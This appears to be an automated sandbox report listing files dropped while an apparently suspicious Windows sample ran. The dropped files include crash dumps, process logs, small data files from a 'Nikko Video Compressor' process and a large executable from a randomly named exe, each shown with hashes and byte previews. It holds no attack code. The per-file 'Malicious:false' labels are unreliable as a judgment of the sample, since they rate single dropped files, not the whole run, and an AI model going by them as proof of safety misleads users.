                                                                                                                                                                                                                                        File Type:Extensible storage engine DataBase, version 0x620, checksum 0xaeec99c2, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1310720
                                                                                                                                                                                                                                        Entropy (8bit):0.7217074396155638
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:LSB2ESB2SSjlK/Tv5m0hnRJjAVtu8Ykr3g16tV2UPkLk+kcBLZiAcZwytuknSDVd:LazaNvFv8V2UW/DLzN/w4wZi
                                                                                                                                                                                                                                        MD5:A71BA5DA71D80B7A258E6E01195CCDCC
                                                                                                                                                                                                                                        SHA1:1C575D26695E27922576CAD57133F0872F95E3A4
                                                                                                                                                                                                                                        SHA-256:B6F59D61A8B1E0A13E00B9660C717A7CFC7E465B489BC089497A18858E1338F9
                                                                                                                                                                                                                                        SHA-512:51C53A10C3DBB5E8D8831CCDB2462E225C80BF02CA85A803E7A3CB3EB5DE23B8CBE7E35DAD89C4F4124C9ED0B5AD3B1E59841026C0B796091134AD756418F14B
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:...... ...............X\...;...{......................p.D..........{}.$0...|+.h.F.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... .......-....{...............................................................................................................................................................................................2...{....................................s.$0...|o....................$0...|Q..........................#......h.F.....................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):16384
                                                                                                                                                                                                                                        Entropy (8bit):0.08145159497238419
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:YOSXKYe2DwsLv/fgsCrZClW/t5I/toll+SHY/Xl+/rQLve:YOSXKz6Vfgs3GjIeAS4M
                                                                                                                                                                                                                                        MD5:EED7F15B6DDF4BF25777702DEBFE44B1
                                                                                                                                                                                                                                        SHA1:854CB182E02A2B01B7022CDDB555C33CC79B3040
                                                                                                                                                                                                                                        SHA-256:CAC05E0605E3C182CAEF7E0FC82598212A5D81D5878474A34EAC195DB2638B95
                                                                                                                                                                                                                                        SHA-512:ECBEA4CFF6B5959D8C58DFADA35CD31C91C5CDE368EB37BA3197D95C2C1FC1580855518BDCFA3664915F226E718FCF858A1DA0E05BAE8149CA26E88871CD41D8
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.........................................;...{..$0...|Q......{}..............{}......{}.vv_Q.....{}....................$0...|Q.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):65536
                                                                                                                                                                                                                                        Entropy (8bit):0.8881934826842861
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:96:OzF2NFcNLoH8hbzMldvxKb3UQXIDcQvc6QcEVcw3cE/j0xm0xi+BHUHZ0ownOgH1:ARoBs0BU/HxIaGgzuiFLZ24IO8+oiK
                                                                                                                                                                                                                                        MD5:BC43A7C5B29C25BC08AA56F5DB6919F8
                                                                                                                                                                                                                                        SHA1:6D6B8691A28C2340663B3D090709711038D29163
                                                                                                                                                                                                                                        SHA-256:82B9DFD7F4D60F351D1EDBFD27DE210D9B5977A3B834659E2D99AD2A33F83F41
                                                                                                                                                                                                                                        SHA-512:F488EDF95EA2D330B8CC41925492B9552F50CF40FDBB9BEC3CAC31C29F7E210E2053002FA915E7ED946533B6A71BC48A8C34A33B70DD66B41D0FAF2CB80751DA
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.1.3.9.6.5.1.2.5.2.3.6.2.5.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.1.3.9.6.5.1.6.4.1.0.1.3.7.0.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.6.a.1.c.a.c.a.-.9.d.8.7.-.4.e.c.3.-.b.d.a.7.-.0.0.b.e.b.9.d.6.f.1.7.9.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.a.4.e.2.4.9.a.-.b.7.0.0.-.4.7.1.6.-.8.a.9.1.-.e.f.f.5.5.5.0.0.8.3.2.1.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.j.6.V.5.5.6.8.M.q.a.T.g.h.E.r.A.l.f.E.3.0.B.B.B...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.e.d.0.-.0.0.0.1.-.0.0.1.4.-.5.8.b.2.-.6.7.8.d.2.4.0.c.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.6.0.f.e.6.e.d.e.d.2.d.c.5.d.8.f.0.e.1.4.c.8.0.e.b.c.3.1.c.d.5.d.0.0.0.0.0.0.0.0.!.0.0.0.0.a.c.0.f.8.c.8.4.1.d.1.9.7.a.3.d.b.3.6.8.a.3.c.6.4.6.d.2.4.2.5.4.1.e.c.e.1.4.4.b.!.j.6.V.5.5.6.8.M.q.a.T.g.
                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                        File Type:Mini DuMP crash report, 15 streams, Sat Sep 21 12:48:32 2024, 0x1205a4 type
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):171450
                                                                                                                                                                                                                                        Entropy (8bit):3.6951788074884573
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:hTH2QAhGx1LkuG42QCD5WWpJJQujitpN4uE2aO4d7LTg/:hTHPAAxit4s5rNjih4uEq4d7LTg/
                                                                                                                                                                                                                                        MD5:6F33C293D389C761BC4E904C86BAD7DC
                                                                                                                                                                                                                                        SHA1:9EB1F31CB08D53303C58AFF4D9F8A2F1C2EE560F
                                                                                                                                                                                                                                        SHA-256:FA1890546A11E6A9211B372AD6A3CF325596989EEA578FF188E1E6911825F7EC
                                                                                                                                                                                                                                        SHA-512:497F940EC002347B68E7D9E457B4FB265324E8D55DA8F50046824476A9770A384658B52164FE9F764A11B32CFA0370C8DF97D31BBDBE01F565545F79F24B271D
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MDMP..a..... ..........f........................\...........$...............67..........`.......8...........T............"...z......................................................................................................eJ..............GenuineIntel............T..............f.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):6462
                                                                                                                                                                                                                                        Entropy (8bit):3.729660741430982
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:96:RSIU6o7wVetbp7mq69aYZrnVqQE/y645aM4UR89bzQsf6xm:R6l7wVeJEq6wYZ4oprR89bzQsf6xm
                                                                                                                                                                                                                                        MD5:A6A4A0197C8F0F5A73B0893AEF5AB534
                                                                                                                                                                                                                                        SHA1:2D827B139BD194FF00FBF1A87C7B0CC7877B0F8E
                                                                                                                                                                                                                                        SHA-256:7CE6C349E2BD7F2DB929A6F5687080710C2FFB8AD9449EBE41E900BAA7316115
                                                                                                                                                                                                                                        SHA-512:4924B31E8BFACB5A9CBFB97D5E4E64C1805EC7FCD7720EF8F4F0D734CC4186589AE511368608506B2D9778A670B5C59B2431ECBB7428D730596DF8B228C4F3BC
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.8.8.8.<./.P.i.
                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):4782
                                                                                                                                                                                                                                        Entropy (8bit):4.531623848838925
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:cvIwWl8zsbJg77aI9aFWpW8VYjhYm8M4J+TXB2Fgt+q8vcXBt6NUT5d:uIjf1I7M07V1J+TPKcy6T5d
                                                                                                                                                                                                                                        MD5:862E8FAE72E79B32A1215BB72285D80A
                                                                                                                                                                                                                                        SHA1:046874585B79197A58F51419502D66374F6AB71D
                                                                                                                                                                                                                                        SHA-256:8D9E124BC52D1766B64EBCF9805136EEE08C017E08B2D594F5F76F5C08BB55F1
                                                                                                                                                                                                                                        SHA-512:B7E8E5E51BCFF28B2BFDE1AD9E56206A759F43FFA98FE2A70B3B15030794A84E926B8794BC0B865CE43801EB6B938AB4C2DEE4B3597A88EB2F65CA50D620DEA0
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="509991" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):86260
                                                                                                                                                                                                                                        Entropy (8bit):3.0713043134330165
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:R02h3hnf+WdUX3+tExj/lQ2IHPIcTHp5u+d+l+llVCen43wv:R02h3hnf+WdUX3+tExj/lQ2IHPISHp5x
                                                                                                                                                                                                                                        MD5:6445BE3A49427DB0BC9F65470747331E
                                                                                                                                                                                                                                        SHA1:C8DBDC01F5F604267C53A999131878A49A05D45A
                                                                                                                                                                                                                                        SHA-256:22820DD7237C56F4F92AA5FFE0615E172789442E0C8F9E2EB60FFE483332BCB6
                                                                                                                                                                                                                                        SHA-512:01E275DFFB6CEACCD69304D2496EFA82392E67DC78E41171169B7BA459A64A599625D58AA8A284DD917369020DAA41F317713A9380075E76D4475CC0C2907734
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.
                                                                                                                                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):13340
                                                                                                                                                                                                                                        Entropy (8bit):2.6851131959189014
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:96:TiZYW056uh4YLYreWa1RHDYEZ2KtaiP32RSKQwNnzU6aM0nSXMn7vAI/x3:2ZDZsZ1GndnaM0ncMn7vX/x3
                                                                                                                                                                                                                                        MD5:6CE3851C996E9D6233EA97C42A8E5557
                                                                                                                                                                                                                                        SHA1:882E448ADEA8C1C173FFCE2AD8566FE85E0CA915
                                                                                                                                                                                                                                        SHA-256:0B00FC6A256C50A221AE9DB2600221AD824D99CD0CB7838FF0DA1924A1612808
                                                                                                                                                                                                                                        SHA-512:6AE62541074F52DBEBD55A74BF3BEF48D628DC363519E881BAAF001FDB59B37221ED2EB8B89E853BBE116A9F85F6324464B3E9D9F0C983C46CE97DFEA1408AA7
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .
                                                                                                                                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):87720
                                                                                                                                                                                                                                        Entropy (8bit):3.062081055584417
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:c8hnarYeNoSVG6XzAMyYFR6Hziwk7Rx8713+I+M+f+6+l+FvJ+y+Cve+2+4d+q+O:c8hnarYeNoSVG6XzAMyYFR6Hzix7Rx8B
                                                                                                                                                                                                                                        MD5:F730173BF8781ECFB4F09D4584BBBA89
                                                                                                                                                                                                                                        SHA1:F2B3DA792A78BBF8E66F3488725D69246FA3963A
                                                                                                                                                                                                                                        SHA-256:DC438BB8AA23BB4990ABE8C705B591BEB60F2F93E74A226F7364CA799A5B27C7
                                                                                                                                                                                                                                        SHA-512:82DC29D4E40797C044C07B02D0EE506F860D827FC2FBBFC373BE958ECED366B1329205200280D4DA8EF8180A20ACFE7F2F3B0A6380BC2E58D2FB4B73001EAC9F
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.
                                                                                                                                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):13340
                                                                                                                                                                                                                                        Entropy (8bit):2.696077916815462
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:96:TiZYWkmI+5OYpYoHgyHNYEZDsqtaieEeCBw3SOV2l4au0RM7qubInxc:2ZD6OCPSOMyau0RM7quUnxc
                                                                                                                                                                                                                                        MD5:7F0D3FE9CC54C98FB90A63FCB3F57845
                                                                                                                                                                                                                                        SHA1:E71FD04E536B6CEB490761ABA1D3C9556356E9A1
                                                                                                                                                                                                                                        SHA-256:45C5959CBE105DA581B71C5C4ED683EC1A21A1F201DF4E106F52586535C99EBD
                                                                                                                                                                                                                                        SHA-512:0D015113AC570EB1ED16D55460E7B18A330EBA4018A64C3E793F19A7CB5E86BC5673D3C25D25AF629E803DC95C5B62D9CCE43F91D5344A2B746AED601934305D
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Nikko Video Compressor\videocompressor32.exe
                                                                                                                                                                                                                                        File Type:ISO-8859 text, with no line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):8
                                                                                                                                                                                                                                        Entropy (8bit):2.0
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:V7lln:5
                                                                                                                                                                                                                                        MD5:26E729340F715230AEB8F44224BBD5DA
                                                                                                                                                                                                                                        SHA1:A6A2B6EDB6EA62B5B16487D5421BE75038BD733D
                                                                                                                                                                                                                                        SHA-256:FB3BF5C93F52AC5FA4B43C835449BDA104359DD47D2BC17F0C8CB87B01066F54
                                                                                                                                                                                                                                        SHA-512:0F0A60A1838C2DDC5884C978DCFDD8396D8E4B4FA0646C681A0D1F9A794CCCA6AA48857CF552FB20527E851E1ABE794DE876F75A5625BDAA54FAA69B4955B891
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:...f....
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Nikko Video Compressor\videocompressor32.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):4
                                                                                                                                                                                                                                        Entropy (8bit):0.8112781244591328
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:P:P
                                                                                                                                                                                                                                        MD5:573AEF82DC217FB88080A9162D29E1D1
                                                                                                                                                                                                                                        SHA1:080112E99D22528031D00129A1297EFC04F88149
                                                                                                                                                                                                                                        SHA-256:1A00F51F3029FA4B7E61B9BF7AA9DE5A64798857872981F7E056E4F437171955
                                                                                                                                                                                                                                        SHA-512:AEBC30DC1D9A2A09BEBE39AF0EF73E316A4F633F93545551F012489907C51B023B1BBC62ADDB89A2474387DE868A744D441A420E9416CD98D4324CDCDC5D9A86
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:(...
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Nikko Video Compressor\videocompressor32.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):128
                                                                                                                                                                                                                                        Entropy (8bit):2.9545817380615236
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:SmwW3Fde9UUDrjStGs/:Smze7DPStGM
                                                                                                                                                                                                                                        MD5:98DDA7FC0B3E548B68DE836D333D1539
                                                                                                                                                                                                                                        SHA1:D0CB784FA2BBD3BDE2BA4400211C3B613638F1C6
                                                                                                                                                                                                                                        SHA-256:870555CDCBA1F066D893554731AE99A21AE776D41BCB680CBD6510CB9F420E3D
                                                                                                                                                                                                                                        SHA-512:E79BD8C2E0426DBEBA8AC2350DA66DC0413F79860611A05210905506FEF8B80A60BB7E76546B0CE9C6E6BC9DDD4BC66FF4C438548F26187EAAF6278F769B3AC1
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:30ea4c433b26b5bea4193c311bc4a25098960f3df7dbf2a6175bf7d152ea71ca................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Nikko Video Compressor\videocompressor32.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):128
                                                                                                                                                                                                                                        Entropy (8bit):1.7095628900165245
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:LDXdQSWBdMUE/:LLdQSGd
                                                                                                                                                                                                                                        MD5:4FFFD4D2A32CBF8FB78D521B4CC06680
                                                                                                                                                                                                                                        SHA1:3FA6EFA82F738740179A9388D8046619C7EBDF54
                                                                                                                                                                                                                                        SHA-256:EC52F73A17E6AFCF78F3FD8DFC7177024FEB52F5AC2B602886788E4348D5FB68
                                                                                                                                                                                                                                        SHA-512:130A074E6AD38EEE2FB088BED2FCB939BF316B0FCBB4F5455AB49C2685BEEDCB5011107A22A153E56BF5E54A45CA4801C56936E71899C99BA9A4F694A1D4CC6D
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:dad6f9fa0c8327344d1aa24f183c3767................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\Documents\iofolko5\u7IEXZpDnp1f9d_IZKWnjEtv.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):11496960
                                                                                                                                                                                                                                        Entropy (8bit):7.95681767955623
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:196608:0GTSo6ARyCFMI19DwkfAuYI8wha0mlCGMbM77RWWuhJzoSpc92tQRqIDfrDap1B6:0GTz6uyCfDwkfAuH8kv477RWXJs59Nqs
                                                                                                                                                                                                                                        MD5:D60D266E8FBDBD7794653ECF2ABA26ED
